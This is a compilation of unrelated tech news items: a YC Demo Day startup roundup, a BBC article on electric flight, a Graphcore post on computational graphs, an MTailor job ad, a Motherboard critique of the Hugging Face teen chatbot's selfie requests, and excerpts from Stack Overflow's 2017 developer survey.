Bookkeeping is a $57 billion industry but it’s riddled with human errors and inefficiencies. IQBoxy makes a mobile app that uses machine learning to scan physical or digital receipts and invoices, parse the data, and reconcile the finances with your bank. It handles end-to-end bookkeeping with no humans involved instead of just handing small parts of the expense chain. IQBoxy is growing 30% monthly and has processed 1.2 million receipts and invoices. Now it has a product called IQBoxy For Accountants, which lets accountants avoid busy work by freely registering their clients for IQBoxy’s paid service. The tech has finally arrived to leave the chore of bookkeeping to the machines.

 

Beek – Book review site for Latin America

Beek claims to be the biggest book review site in Lat in America, with more than 150,000 weekly active users submitting an average of five reviews a week. User reviews are no longer than a tweet and use emoji, and also allows readers to leave reviews as they’re reading, so many review books multiple times. Today the company is focused on booke reviews, but has plans to expand into other types of emdia and experiences, to become the review site for everything in Latin America.

 

 

Bulk MRO – Industrial supplies for India

Bulk MRO wants to become the Alibaba for enterprises in India, providing a one-stop shop for all the industrial tools they might need. The company is already at a $4.3 million GMV annual run rate and has $1.1 million in orders for the next quarter, and it’s profitable. 22 of Bulk MRO’s customers are Fortune 500 companies and more than 89 percent of its orders are repeat business. The company is going after the $20 billion market of industrial products sold every year, which is expected to double by 2022.

 

Soomgo – Thumbtack for South Korea

Soomgo has created a marketplace that helps local service providers in South Korea find new customers. Unlike the U.S., which has Yelp, Angie’s List, and other marketplaces for local service providers, South Korea is home to more than 1.5 million businesses spending an average of $500 a month on advertising. With Soomgo, they buy credits upfront to be connected with potential customers and try to win their business. Soomgo already has more than 30,000 service providers signed up and is making over $50,000 a month in net revenues.

 

Cartcam – Shopping app for the Snapchat generation

Cartcam is a shopping platform that gives people discounts for creating short video reviews. The company hopes to take advantage of the trend of consumers who are 85% more likely to purchase an item after watching a video. Cartcam incentivizes mobile creators to review items by offering them discounts on the items they want to buy. Already 12 percent of users place an order through the platform, and they are all creating content for Cartcam. The company makes money by partnering with brands who pay for the discounts in exchange for content that will sell more goods for them.

 

Peer5 – P2P Serverless CDN

Peer5 is a peer-to-peer CDN for live video streaming, which has already attracted clients like Sony and Dailymotion. The company is trying to solve the problem of how to stream to more than 1 million concurrent users. Unlike traditional streaming solutions, peer-to-peer video streaming gets better with the more people who are connected. The company also does all this through javascript, without relying on any plugins or downloads. After five years of iteration over 1.4 billion video sessions, Peer5 now has 25 paying customers signed up. Because they’re not buying servers, Peer5 can charge half the price and still make 98 percent margins on streaming.

 

Pit.ai – Automatically mining trading strategies

Pit.ai is an AI-powered hedge fund that charges no management fees. The company has built AI to create new trading strategies that allows it to cut out the money other hedge funds pay their traders. Instead of taking management fees, Pit.ai only takes a cut of profits it generates on behalf of clients. That means it only makes money when its clients make money.

 

SmartAlto – Software suite for commercial real estate

SmartAlto helps commercial real estate owners to win and close deals faster. Rather than keep all of their files and communications in email and spreadsheets, SmartAlto allows those customers to have a single hub for all their people, communications and deals. The platform helps them organize prospects, conduct due diligence and keep track of all processes all the way to closing. There are more than 2 million commercial real estate professionals in the U.S. operating in a $3.6 billion industry, but SmartAlto wants to expand to banks and government agencies after that.

 

XIX.ai – Predictive assistant that anticipates your needs

Founded by AI researchers from OpenAI, Google Research and the University of Berkeley, XIX was built to actively predict what users want to do at any time. Based on user behavior, the service has a 90 percent prediction rate — which means 9 out of 10 times it knows what a user wants to do before they do. Once it gets to 99 percent, XIX believes that users will never have to click through to various apps to complete various tasks, as long as they have an Android mobile phone.

 

Zestful – Employee activities as a subscription service

Zestful provides a subscription service through which companies pay them $100 per employee each month. Employees then go onto the platform and vote on a number of activities that they want to do, and Zestful’s software books those activities for them. Team activities are the best way to increase productivity, and companies spent $3 billion on team activities last year. However many companies, even if they have budget, don’t do activities because no one wants to plan them. Zestful solves that problem for them. Although it just launched in San Francisco, Zestful already has 16 companies on board.

 

Arthena – Art investing for everyone

Arthena has built a platform to make smart decisions around investing in art — it knows what to buy, when to sell, and how to make money. There was $70 billion in art traded last year, but it’s a market that’s highly inefficient. Arthena uses its knowledge of the art market to allow investors to make art just another part of a diversified investment portfolio, and has raised $20 million in funds over the last 10 weeks to invest.

 

Mednet – Stack Overflow for oncologists

The Mednet is a network of oncologists who are trying to treat cancer. It allows them to share knowledge with each other, helping the 80 percent of oncologists who are generalists to improve treatment. The company makes money by helping to speed up clinical trials, connecting  pharma companies with the oncologists who are treating particular problems. Today, 70 percent of clinical trials are delayed due to enrollment problems, and the Mednet thinks it can change that.

 

Penny – A mobile personal finance coach

Penny provides an app that helps normal people understand their finances and to improve them. On the back end Penny tracks your income and spending, and on the front end uses a chat interface to provide personal coaching to its users. It can acquire new users for $2 a piece, and has rolled out a premium membership that hundreds of users are already paying for. Users on average have cut spending by 16 percent in targeted categories, and 15 percent of users click through to affiliates it suggests to help them lower their debt.

 

Moneytis – The cheapest way to send money abroad

Moneytis wants to provide a cheaper way for customers to send money between two countries. Users simply say how much they want to send and where they want to send it, and Moneytis finds the best way to send that money. Over the past 10 weeks alone, Moneytis has transferred $3 million for its users. Every year, 250 million people send $600 billion dollars internationally, and businesses send $25 trillion. That’s a huge market Moneytis wants to own.

 

Hogaru – Cleaning for SMBs in Latin America

Hogaru provides professional cleaning services to small and medium sized businesses in Latin America. The cost of acquiring a cleaner in Latin America is much lower than in the U.S., and Hogaru keeps those cleaners by hiring them as actual employees. As a result, it can attract and employ cleaners at a fraction of the cost of what it would take in the U.S. Since they are treated as employees, those cleaners are much less likely to churn and the company can control their schedules. The lifetime value of customers is 14 times the cost of acquisition, and the company makes more than $240,000 revenue each month.

 

Bulletin – WeWork for retail space

Bulletin finds premium retail locations, sets them up to look like Apple Stores, and then allows brands to pre-pay for space. Brands are already spending $2,000 upfront per month for just 8 square feet of space on Bulletin. The company can onboard brands in just five days and make their products available for sale. There are 10 million brands on Etsy, Shopify, Squarespace and Amazon, and pop-up stores are a $20 billion industry. By lowering the price, making it turnkey and making premium real estate accessible, Bulletin hopes to change how the industry is run.

 

Sycamore – Onboarding drivers for on-demand jobs

Sycamore allows any company to add a driver in less than 5 minutes. That’s important because drivers are making so little some are sleeping in their own cars. Sycamore removes unnecessary steps and pools for good drivers. Companies lower their acquisition costs by 70%. The company launched 3 weeks ago and has completed 640 jobs with 2x’s weekly growth and 14% commission for drivers. Any company can also deploy surge pricing, creating a better backbone for driver delivery.

Aella Credit – Consumer and low-income lending platform

Aella endeavors to give low-income people credit in Africa. More than 90% of the continent can’t access credit and 425 million people can’t get mid-sized loans. The reasons are various but have much to do with approving credit. However, McKenzi says this is a potential $10 billion industry in Africa. Aella built a way to get a mid-size loan ($500 and above) by allowing access to credit through data partnerships like HR data and biometrics. So far Aella has given $1.47 away and says it has a good repayment rate. How’s it working out so far? There are currently 300 companies on the waiting list for Aella with $36 million in combined income.

 

Tolemi – Software to help cities find distressed properties

A self-described Palantir for city government, Tolemi is building a data hub to connect all the city property data, starting with vacant properties. Tolemi works by hooking into government data within cities and connecting that data to show city government where potential problems are. In the 11 months since launch, Tolemi already has $1.3 m under contract and a $800 ARR. It is currently being used in 54 cities and with a team of just four people, Tolemi says it is already profitable. Something that used to be done by hiring contractors to take a lot of time and cost thousands of dollars can now be done in an instant and helps with Urban planning, identifying fire hazards, vacancies and other things a city might want to know.

 

Niles – Conversational wiki for business

Niles is a wiki you can talk to in Slack. This bot answers internal team questions instead of digging through Google Doc or Sharepoint to get them. If you want to know what the discount for an enterprise customer is you just ask Niles, for instance. Niles will find answers in your spreadsheet and other materials to save you time and frustration searching. The team comes from Google, Palantir, and Apartment List. It said it also launched to TechCrunch last week and blew up (this is the first this writer has heard of the product). It’s a $27 b market and claims 700 teams signed up in one week.

 

Upcall – Outbound calls as a service

Calling someone is 16x’s more effective than email but if you have to do it yourself you’ll take a long time to call a bunch of people. Upcall makes it easy to call people by connecting you to a network of call agents working from home. You can listen in on the calls and get feedback in real-time. Right now Upcall has a 100 agent network and has conducted over 85k minutes. It also claims over 350 customers like LG, Coldwell Banker, and others to call people for things like debt collection, surveys and more. This is a $23 billion industry in the U.S. and the company plans to expand to several countries in different languages. It has tripled rev since starting YC and says it is building the “call revolution.”

 

KidPass – One pass for “amazing activities for kids”

KidPass is a ClassPass for kids activities, a $30 billion industry. But it is highly decentralized. KidPass solves this by building one place to discover and book activities for kids. It launched in NYC this year and today has over thousands of activities on the site and claims more than 3,000 families using the service with a $180,000 ARR. Next month it says it will be profitable but also plans to expand the service to include new kid pass exclusive passes. It also works with new providers and inventory to expand the experience. It is currently the largest NYC kids activity marketplace.

 

Lively – Modern healthcare savings account (HSA)

HSA’s are a triple advantage savings accounts and the “future” of savings says the founder and will hit a $435 billion market. Lively is a modern HSA that makes it easy to access what you have in the bank. It has already worked out permissions with the bank so you can have the money for what you need. Lively is also creating a healthcare marketplace and is a payments and banking platform.

 

Indigo Fair – Amazon for local retailers

Indigo Fair is a free, AI-powered platform where retailers can find new products for their store. It allows retailers to A/B test merchandise and they are able to return what doesn’t sell for free as well. The team built Square Cash and one of them headed Square Capital. Local retail in the U.S. is a massive market and “shop local” is a slogan not going away. Most small business owners go to trade shows or buy through independent sales reps but no one has so far figured out how to get them shopping online until now.  The company has 30 retailers in the past eight weeks since launch and says it has a high rate of return, potentially worth $450,000 in LTV and has on-boarded 6,000 makers.

 

Collectly – Stripe for medical debt collection

Collectly helps doctors collect 2x’s more debt than they have before. It’s a business with $280 billion sent to debt but the debt collectors only collect on average up to 20%. The founder is a former CEO of a debt collection agency and collected over $100 million before. His new startup works by making it easy for debtors to pay what they owe by paying online and setting up payment plans. Collectly launched 3 weeks ago and is growing 20% week-over-week. It has already signed up 14 doctors who pay a 15% fee. So far the startup has been able to collect $65,000 and says that is a 56% success rate vs the debt agencies.

 

Tetra – Automatic notes for business meetings

A lot of meeting notes are taken in Evernote but Tetra takes call notes for you by automatically dialing you to merge into the call and then sending you a fully searchable record of the entire conversation. It comes in auto speech only or human edited using a fast transcription feature for 50 cents a minute from humans. There may be some ethical challenges around recording others and each person using the service will need to inform those on the call they are being recorded but with two billion hours of conference calls a year, Tetra plans to take on that market using it’s AI and data. The startup launched on Product Hunt a week ago and now has two paid monthly users.

 

FloydHub – Heroku for deep learning

Deep learning is a huge deal in the tech industry but it’s really hard to get it to work. The founder has been doing deep learning since early days in 2009 and has a plan to make working with it less of a pain by helping you to train and deploy deep learning models. So far the traction seems promising with more than 2500 users and 6,000 on the waiting list since launching 4 weeks ago.Udacity loves Floyd so much, according to the founder, they are switching from AWS to Floyd. The startup is also building a marketplace with 3,000 datasets and 1.5 terabytes of data.

ReturnBase — Solves returns for retailers

According to the National Retail Federation, Americans returned $260 billion in merchandise to retailers in 2015, or 8 percent of all purchases. Over the holidays, that figure reportedly jumps to 10 percent. Garter Research has said because less than 50 percent of those products are re-sold at full price, these returns can cost retailers 10 percent of their sales. In fact, some of it ends up in landfills, if not at discount warehouses.

ReturnBase, a year-old, California-based startup is setting out to tackle this “operational nightmare” for retailers through a platform that allegedly makes selling and pricing more efficient, including from  assessing demand, to photographing goods, to inspections. In fact, the company says that despite its 35 percent commission on every transaction, it can produce for retailers three times what they’re currently squeezing out of returns. At scale, argues the company, that’s a $100 billion opportunity.

 

Ledger Investing — Helps insurance companies reduce risk

The concept of “insurance securitization” dates back more than 40 years, but it was other securitized products — think mortgage-backed securities — that ultimately captured the imagination of Wall Street. There’s a good reason for that, argues Ledger Investing, a year-old, Mountain View, Ca. startup that points the blame at the various and complex types of insurance that gets bought and sold every day. (Think more and less risky underwriting risk.) What’s changed? According to Ledger, at least, it has finally figured out how to create a business-to-business online marketplace where insurers and investors can confidently sell and buy different types of securities linked to various classes of insurance — and at scale. Certainly, the company’s CEO might instill confidence in those intrigued by this kind of financial product. Samir Shah, who joined the company last September, was formerly the head of Insurance Capital Markets at AIG.

 

Armory —  Deployment and rollback software

Armory is a company that’s commercializing Spinnaker, an open source, multi-cloud continuous delivery platform for quickly (and, hopefully self-assuredly) releasing software changes. The company’s apparent thinking: All the cool kids are using Netflix, including Netflix, which uses it to  allow it to build and integrate continuously into its worldwide deployments in more than 50 countries. Netflix even open sourced it toward that end. But Spinnaker remains “an insanely complicated piece of software,” according to Armory, so it has built proprietary software  atop the platform that it hopes to sell to every Global 2000 company that’s moving to the cloud in the next decade. (Put another way, it intends to sell to all of them.)  Some of the features it’s already offering its budding base of enterprise customers? Safety, security, and compliance.

 

RankScience — Software-automated SEO.

The straightforward tagline of RankScience is “software-automated SEO,” and according to its CEO, Ryan Bednar, the company’s technology is nearly as simple to use for customers. “Just plug in RankScience, and search traffic goes up,” he told the crowd at today’s YC Demo Day. It’s a big opportunity. Notably, Google makes $50 billion off of search every year. Unfortunately, Bednar was a little light on how RankScience works (aside from selling subscription software that automates testing and continuously optimized web pages). But he insisted that over the three-month period that RankScience was a participant in YC’s program, early clients saw their average search traffic jump by 68 percent. Without sharing how much the company charges for its results, he added that RankScience is currently seeing $80,000 in monthly recurring revenue.

Read more about RankScience in TechCrunch.

 

MDAcne — Dermatology telemedicine app

MDAcne is a mobile app that does just what you’d guess it does — try treating people with acne remotely. Why bother? According to the company, 500 million people suffer from acne, yet 90 percent never see a dermatologist because it’s too expensive. MDAcne’s solution to replace those visits with an easy, accessible, and more affordable app that’s driven by computer vision. Just take a selfie, and MDAcne will analyze your skin, then spit out a routine that fits your specific condition, along with provide suggestions about which products to use. (Hello, affiliate money.) The company launched two months ago and says it has already registered 50,000 people. It didn’t say what percentage of them are paying the company the $13 per month that it’s currently charging for its services.

 

Sandbox — App store for banks

Sandbox is a company whose software integration platform aims to connect the legacy systems of banks and credit unions and provide them with one standardized API that their fintech vendors can use to integrate with them seamlessly. Put another way, it’s building an app store for banks. So far, it says 17 fintech vendors have agreed to use the platform; the unsurprising idea is to hit critical mass, after which “every new financial institution will consume the newest technologies via Sandbox.” Like all app stores, notes the company, it’s a “winner take all market.” (As for how it makes money, it has apparently stolen its inspiration from Apple here, too, with plans to take a 30 percent revenue cut from every sale.)

lvl5 — Maps for autonomous vehicles

You might have read recently that one of the biggest obstacles to building self-driving technologies is a shortage of special laser sensors like LiDAR that help cars figure out what’s around them.  These sensors — which emits short pulses of laser light so that software in a vehicle can create a 3D image of its surroundings — can also be atrociously expensive, ranging from $80,000 to $8,000. Now, lvl5 thinks it has an even better, cheaper, and more plentiful solution: computer vision software that extracts visual landmarks like stop signs and landlines, then aggregates the data into a kind of 3D map of the world that enables cars to triangulate their locations down to within an inch. Basically, the company says it can achieve the same level of accuracy as LiDAR. But better, it alleges, its system combines its software with cheap cameras, opening up the possibility for the mass production of self-driving cars. Even more interesting here: lvl5 thinks that software will become a commodity, so it isn’t even charging for it right now. It sees the big money instead in its mapping data (and that ain’t free).

ACLU – A non-profit you might know 

The American Civil Liberties Union was a surprise addition to this YC batch but is at the forefront of the fight against the Trump administration and defending American Values. Director of the ACLU Anthony Romero got a loud applause as he took to the stage to talk about how for 97 years the ACLU has been defending the rights of individuals, including in hard-fought trials such as Scopes (right to teach evolution), Miranda rights, the right to contraception, Loving (the right for interracial couples to marry) and many others. The ACLU has 300 litigators and 1300 staff working to move forward on a broad range of issues. But it is still the David to Goliath as the Trump administration dwarfs it with more than 19,000 lawyers. It needs our help to continue fighting for the rights of immigrants, women, same-sex couples and other disadvantaged groups. An average gift is $70 and ACLU needs our help to cut across party line to instill American Values, defend core civil rights and stand up for the American people.

 

Close this section

London-Paris electric flight 'in decade'

Wright One planeImage copyright Wright Electric
Image caption A mock-up of the Wright One, Wright Electric’s plan for short-haul, electric-powered flight

A new start-up says that it intends to offer an electric-powered commercial flight from London to Paris in 10 years.

Its plane, yet to go into development, would carry 150 people on journeys of less than 300 miles.

Wright Electric said by removing the need for jet fuel, the price of travel could drop dramatically.

British low-cost airline Easyjet has expressed its interest in the technology.

"Easyjet has had discussions with Wright Electric and is actively providing an airline operator's perspective on the development of this exciting technology," the airline told the BBC.

However, significant hurdles need to be overcome if Wright Electric is to make the Wright One, pictured above, a reality.

The company is relying heavily on innovation in battery technology continuing to improve at its current rate. If not, the firm will not be able to build in enough power to give the plane the range it needs.

Industry experts are wary of the company's claims. Graham Warwick, technology editor of Aviation Weekly, said such technology was a "long way away".

"The battery technology is not there yet," he told the BBC.

"It's projected to come but it needs a significant improvement. Nobody thinks that is going to happen anytime soon. And there's all the [safety] certification - those rules are yet to be created, and that takes time."

The company is yet to produce a plane of its own and is instead working alongside American inventor Chip Yates, whose own electric aircraft, the Long-ESA, holds the world record for fastest electric aircraft.

Wright Electric's competitors include aviation giant Airbus, which has been developing its electric two-seater plane E-Fan since 2014, and has stated plans to create its own short-haul electric aeroplane seating 70 to 90 passengers.

Wright Electric is backed by Y Combinator, Silicon Valley's most highly-regarded start-up incubator programme. Alumni of the scheme include companies such as AirBnB, file storage company Dropbox and HR management software firm Zenefits.

Wright Electric's goal, detailed in a presentation given to potential investors on Tuesday, is to make all short-haul flights electric-powered within the next 20 years, which would be about 30% of all flights made globally.

The company said that as well as lower fuel costs for the airlines, the technology could have a major added benefit for the public.

"Depending on how it's designed, you can have an electric plane that's substantially less loud than a fuel plane," said Jeff Engler, Wright Electric's co-founder.

Batteries would be charged separately, he said, meaning planes would not have to sit on the tarmac while power is replenished.

"The way we've designed our plane is to have modular battery packs for quick swap using the same cargo container that's in a regular airplane," Mr Engler said.

"We want it to be as fast as possible, so airlines can keep their planes in the air as long as possible and cover their costs."

Other technology start-ups are seeking to innovate within the aviation industry.

Boom, a company backed by Sir Richard Branson, is developing a Concorde-like supersonic jet. It hopes to achieve London to New York in three-and-a-half hours, a journey which currently takes more than eight hours. It is expected to run test flights later this year.

Follow Dave Lee on Twitter @DaveLeeBBC. You can reach Dave securely through encrypted messaging app Signal on: +1 (628) 400-7370

Close this section

Inside an AI 'brain' – What does machine learning look like?

One aspect all recent machine learning frameworks have in common - TensorFlow, MxNet, Caffe, Theano, Torch and others - is that they use the concept of a computational graph as a powerful abstraction. A graph is simply the best way to describe the models you create in a machine learning system. These computational graphs are made up of vertices (think neurons) for the compute elements, connected by edges (think synapses), which describe the communication paths between vertices.

Unlike a scalar CPU or a vector GPU, the Graphcore Intelligent Processing Unit (IPU) is a graph processor. A computer that is designed to manipulate graphs is the ideal target for the computational graph models that are created by machine learning frameworks.

We’ve found one of the easiest ways to describe this is to visualize it. Our software team has developed an amazing set of images of the computational graphs mapped to our IPU. These images are striking because they look so much like a human brain scan once the complexity of the connections is revealed – and they are incredibly beautiful too.

 A machine learning model used in astrophysics data analysis:

ligo_zoom_logo.png

Before explaining what we are looking at in these images, it’s useful to understand more about our software framework, Poplar™ which visualizes graph computing in this way.

Poplar is a graph programming framework targeting IPU systems, designed to meet the growing needs of both advanced research teams and commercial deployment in the enterprise. It’s not a new language, it’s a C++ framework which abstracts the graph-based machine learning development process from the underlying graph processing IPU hardware.

Downlo

We’re also building a comprehensive, open source set of Poplar graph libraries for machine learning. In essence, this means existing user applications written in standard machine learning frameworks, like TensorFlow and MXNet, will work out of the box on an IPU. It will also be a natural basis for future machine intelligence programming paradigms which extend beyond tensor-centric deep learning. Poplar has a full set of debugging and analysis tools to help tune performance and a C++ and Python interface for application development if you need to dig a bit deeper.

We have designed it to be extensible; the IPU will accelerate today’s deep learning applications, but the combination of Poplar and IPU provides access to the full richness of the computational graph abstraction for future innovation.

Poplar includes a graph compiler which has been built from the ground up for translating the standard operations used by machine learning frameworks into highly optimized application code for the IPU. The graph compiler builds up an intermediate representation of the computational graph to be scheduled and deployed across one or many IPU devices. The compiler can display this computational graph, so an application written at the level of a machine learning framework reveals an image of the computational graph which runs on the IPU.

The image below shows the graph for the full forward and backward training loop of AlexNet, generated from a TensorFlow description.

alexnet_label logo.jpg

Alexnet: deep neural network

The AlexNet architecture is a powerful deep neural network (DNN) which uses convolutional and fully-connected layers as its building blocks. It rose to fame in 2012 when it won first place for image classification in the ImageNet Large Scale Visual Recognition Competition (ILSVRC). It was a break through architecture, achieving a large accuracy margin over non-DNN models.

Our Poplar graph compiler has converted a description of the network into a computational graph of 18.7 million vertices and 115.8 million edges. This graph represents AlexNet as a highly-parallel execution plan for the IPU. The vertices of the graph represent computation processes and the edges represent communication between processes. The layers in the graph are labelled with the corresponding layers from the high level description of the network. The clearly visible clustering is the result of intensive communication between processes in each layer of the network, with lighter communication between layers.

The graph itself is heavily dominated by the fully connected layers towards the end of the network structure, which can be seen in the centre and to the right of the image, marked as Fully Connected 6, Fully Connected 7 and Fully Connected 8. These fully connected layers distinguish AlexNet from more recent architectures such as ResNet from Microsoft Research, an example of which is shown below.

resnet50_label_logo.jpg

Resnet 50: deep neural network

A graph processor such as the IPU is designed specifically for building and executing computational graph networks for deep learning and machine learning models of all types. What’s more, the whole model can be hosted on an IPU. This means IPU systems train machine learning models much faster than, and deploy them for inference or prediction much more efficiently than other processors which were simply not designed for this new and important workload. Machine learning is the future of computing and a graph processor like the IPU is the architecture that will carry this next wave of computing forward. 

Close this section

MTailor (YC S14) Is Hiring a Supply Chain, Operations and Business Analyst in SF

About MTailor

MTailor sells men’s custom clothing (shirts, suits and jeans) by measuring you with your phone's camera. MTailor’s computer vision technology is 20% more accurate than a professional tailor. Custom shirts start at $69, custom suits at $499 and custom jeans at $79.

MTailor is the first easy and accessible way to experience the luxury of custom clothing. At the same price as many mainstream off-the-rack clothiers (e.g., J. Crew, Brooks Brothers, Ralph Lauren) and with the convenience of an app, you can get clothing made to fit you perfectly, instead of clothing made to fit someone else.

To help us innovate on price, speed of delivery, quality and new product development, we have established our own factory and operations in Dhaka, Bangladesh.

We are based in San Francisco and backed by some great investors, such as Khosla Ventures, Y Combinator, and some of Silicon Valley’s best angel investors.

Job Description

The Supply Chain, Operations and Business Analyst will report directly to the CEO and be the US point person on MTailor’s Bangladesh operations. You will be responsible for the factory’s daily operational execution and longer term decision-making, planning and implementation. You will combine heavy analytics with a strategy and operational mindset to hit daily production goals, hire for planned growth and develop new custom products. You will interact with the Bangladeshi team every single day from San Francisco.

Since custom clothing at scale is new and has a different structure vs. typical off-the-rack clothing, you will often have to think from first principles and design new procedures.

Responsibilities

  • Own the daily relationship between the US team and the Bangladeshi team. This is mostly through Google Sheets, JIRA, WhatsApp and phone calls
  • Define and implement daily and monthly analytics and metrics to serve business strategy
  • Remotely monitor the daily operation of the Bangladesh Factory
    • Make sure they hit important metrics (e.g., output / day, cost / shirt)
    • Make sure inventory is correctly monitored
  • Analyze historic trends and future expectations to handle Bangladeshi budgeting
  • Drive their hiring needs and process
    • Screen and hire Bangladeshi managers
    • Make sure the factory is hiring production staff at the right pace for growth targets
  • Direct fabric purchasing and planning
    • Analyze trends in sales to optimize variety and purchase amounts
    • Make decisions on fabric purchasing
  • Implement optimization procedures to increase speed, drive costs down and maintain quality
  • Guide the factory to hit growth as the business requires
  • Travel to Bangladesh 3 – 5x / year
  • Control the process for new product development (e.g., custom chinos, custom polos)
  • Be ready for new projects as they arise

We are an equal opportunity employer and value diversity at our company. We do not discriminate on the basis of race, religion, color, national origin, gender, sexual orientation, age, marital status, veteran status, or disability status.

Potential for significant equity compensation.

Close this section

Privacy issues with the “Hugging Face” chatbot for teens

Hugging Face is a new, "fun" chatbot aimed at teens and it's named after an emoji. In press releases, the company boasts that in the testing phase the app exchanged millions of messages with users, and 500,000 selfies. It launched on the App Store this week. 

The idea is that the app learns more about you as you give it more information, remembering details like your name and age. As it turns out, the app is a bit of a privacy nightmare, which is made worse by the fact that it's marketed towards teenagers. 

When I downloaded the Hugging Face app, the first thing the chatbot did after a short, introductory exchange was ask for a selfie. I didn't want to do that. Here's how the bot responded: 

Me: That's weird, we just started talking.
Hugging Face: It's not a pic fool. Take a pic from the keyboard!
You send me one. 
It's not a pic fool. Take a pic from the keyboard! 
I really don't want to send you a selfie. 
It's not a pic fool. Take a pic from the keyboard!
How will the people who created you use my selfie?
It's not a pic fool. Take a pic from the keyboard!
Can I talk to you without taking a selfie? 
It's not a pic fool. Take a pic from the keyboard!
What are your privacy policies regarding the use of my information including my selfie?
It's not a pic fool. Take a pic from the keyboard!
Why do you want my selfie?
It's not a pic fool. Take a pic from the keyboard!
If you were a real person this would be extremely creepy. 
It's not a pic fool. Take a pic from the keyboard!

I finally sent Hugging Face a picture of an envelope in front of my laptop. "Nice laptop, but I don't think it's your selfie," the bot responded. "Can you send me a better one?"

I asked how it knew that it was my laptop in the photo. "It's not a pic fool. Take a pic from the keyboard!" I asked if it used facial recognition technology. "It's not a pic fool. Take a pic from the keyboard!" Hugging Face finally relented when I sent it a photo of 90s TV star Luke Perry. Then it asked what my name was. Then it asked for my age. 

Keep in mind that this app is aimed at teenagers. 

"Selfies, for teenagers, are the main way of communicating emotions"

This is all pretty concerning, because Hugging Face's privacy policy, when I finally tracked it down, states that my information will be used to "deliver the type of content and product offerings in which you are most interested." Further, "non-personally identifiable" information may be given to third parties "for marketing, advertising, or other uses." It goes on to promise that any personal information will be kept confidential.

Basically, the site will use your information for marketing purposes pretty much like every other online service. The difference with Hugging Face is that the exchange felt much less like a request, and more like a demand. Usually, you're offered the opportunity to view a site's privacy policy before being required to pony up sensitive information. 

When I spoke to New York-based Hugging Face co-founder Clément Delangue over the phone, he told me that the app asks for a selfie because the team discovered that users wanted to send selfies to their chatbot friend. 

"Selfies, for teenagers, are the main way of communicating emotions," Delangue said. "So we implemented this feature as a way for users to communicate with the AI."

Screengrab: Hugging Face/Author

Asking for a selfie automatically was for simplicity's sake, he explained. "We don't feel like we need to make the experience way more complex," Delangue said, "and 90 percent of the users are using it pretty seamlessly."

The chatbot uses computer vision technology to recognize if a face is present in a photo, but doesn't use facial recognition and can't distinguish between individual faces, Delangue clarified. 

Delangue said that I'd become stuck in an unfortunate selfie-asking loop and that the "bug," as he described it, would be fixed in an update. He also said that if I had asked the bot for the privacy policy before it asked for my selfie, I would have received it. Indeed, much later in the conversation when I asked the chatbot for the privacy policy, it was served up without a hitch. 

But as for a supposed opportunity to view the policy before being asked for a selfie, I don't buy it. There were just seven texts sent by the bot before it asked for my selfie, all asking me to do some basic setup steps, and so it's tough to see where I would have had the opportunity to ask for the policy before being essentially coerced into giving over my photo. 

Delangue said that teenagers are smart enough to know how to trick the AI. "They're smart enough to use photos of other people or celebrities," he explained. Maybe, but the app doesn't ask for a photo of a celebrity—it asks for a photo of you

Regardless, Delangue said, Hugging Face has no immediate plans to use people's data for marketing purposes and instead will use it to improve the chatbot. 

But don't forget—it's in the privacy policy. 

Subscribe to pluspluspodcast , Motherboard's new show about the people and machines that are building our future.

Close this section

Stack Overflow Developer Survey Results 2017

Each month, about 40 million people visit Stack Overflow to learn, share, and level up. We estimate that 16.8 million of these people are professional developers and university-level students.

Our estimate on professional developers comes from the things people read and do when they visit Stack Overflow. We collect data on user activity to help surface jobs we think you might find interesting and questions we think you can answer. You can download and clear this data at any time.

Developer Type

Desktop applications developer

Developer with a statistics or mathematics background

Embedded applications/devices developer

Machine learning specialist

Quality assurance engineer

36,125 responses; select all that apply

About three-quarters of respondents identify as web developers, although many also said they are working to build desktop apps and mobile apps.

Specific Developer Types

10,696 responses; select all that apply
1,558 responses; select all that apply

Marketing or sales manager

4,890 responses; select all that apply

Compared to the rest of the world, the United States has a higher proportion of people who identify as full stack web developers, whereas Germany has a comparatively lower proportion. As for mobile developers, the U.S. and United Kingdom have proportionally more iOS developers and fewer Android developers than the rest of the world.

People other than full-time developers also write code as part of their jobs, and they come to Stack Overflow for help and community. This year, we gave additional occupation options to respondents who are not full-time developers, but who occasionally code as part of their work. These roles include analyst, data scientist, and educator.

Years Since Learning to Code

51,145 responses

A common misconception about developers is that they've all been programming since childhood. In fact, we see a wide range of experience levels. Among professional developers, one-eighth (12.5%) learned to code less than four years ago, and an additional one-eighth (13.3%) learned to code between four and six years ago. Due to the pervasiveness of online courses and coding bootcamps, adults with little to no programming experience can now more easily transition to a career as a developer.

Years Coding Professionally

40,890 responses

Web and mobile developers have significantly less professional coding experience, on average, than developers in other technical disciplines such as systems administration and embedded programming. Across all developer kinds, the software industry acts as the primary incubator for new talent, but sees a relatively low proportion of more experienced developers. For example, 60% of mobile developers at software firms have fewer than five years of professional coding experience, compared to 45% of mobile developers in other industries.

Among professional developers, 11.3% got their first coding jobs within a year of first learning how to program. A further 36.9% learned to program between one and four years before beginning their careers as developers. Globally, developers in Southern Asia had the lowest average amount of prior coding experience when beginning their careers; those in continental Europe had the highest.

Years Coded Professionally in the Past

51,145 responses; among respondents who indicated they no longer program as part of their job

Respondents who indicated that they had worked as professional developers in the past, but now did something else for a living, were asked how long they had coded as part of their jobs.

Gender

35,990 responses

We asked respondents for their gender identity. Specifically, we asked them to select each of the following options that apply to them:

  • Male
  • Female
  • Transgender
  • Non-binary, genderqueer, or gender non-conforming
  • A different identity (write-in option)

According to Quantcast, women account for 10% of Stack Overflow’s U.S. traffic. Similarly, 10% of survey respondents from the U.S. identify as women. In our survey last year, 6.6% of respondents from the U.S. identified as women.

Meanwhile, women account for 9% of Stack Overflow’s UK traffic, while 7.3% of survey respondents from the UK were women. Finally, women account for 8% of Stack Overflow’s traffic from both France and Germany, while 5.1% and 5.6% of respondents from those countries, respectively, identify as women.

We will publish additional analysis related to respondents’ gender identities in the coming weeks.

Ethnicity

White or of European descent

Hispanic or Latino/Latina

Black or of African descent

Native American, Pacific Islander, or Indigenous Australian

33,033 responses

This was the first year we asked respondents for their ethnic identity. We asked them to select each option that applied.

We asked respondents this question to add an important dimension to what we can learn about developers. In addition, public policy researchers and employers frequently look to us for information on how they can reach out to and better understand underrepresented groups among developers.

We will publish additional analysis related to respondents’ ethnic identities in the coming weeks.

Disability Status

None or prefer not to say

1,755 responses identified as having a disability

Similar to our question about ethnicity, this was the first year we asked respondents for their disability status. Of the 3.4% of respondents who identified as having a disability, we asked them to select each option that applied, and we included a write-in option. We know developers can experience many forms of disability. For this survey, we confined our list of standard options on this question to disabilities that require some physical accommodation by employers.

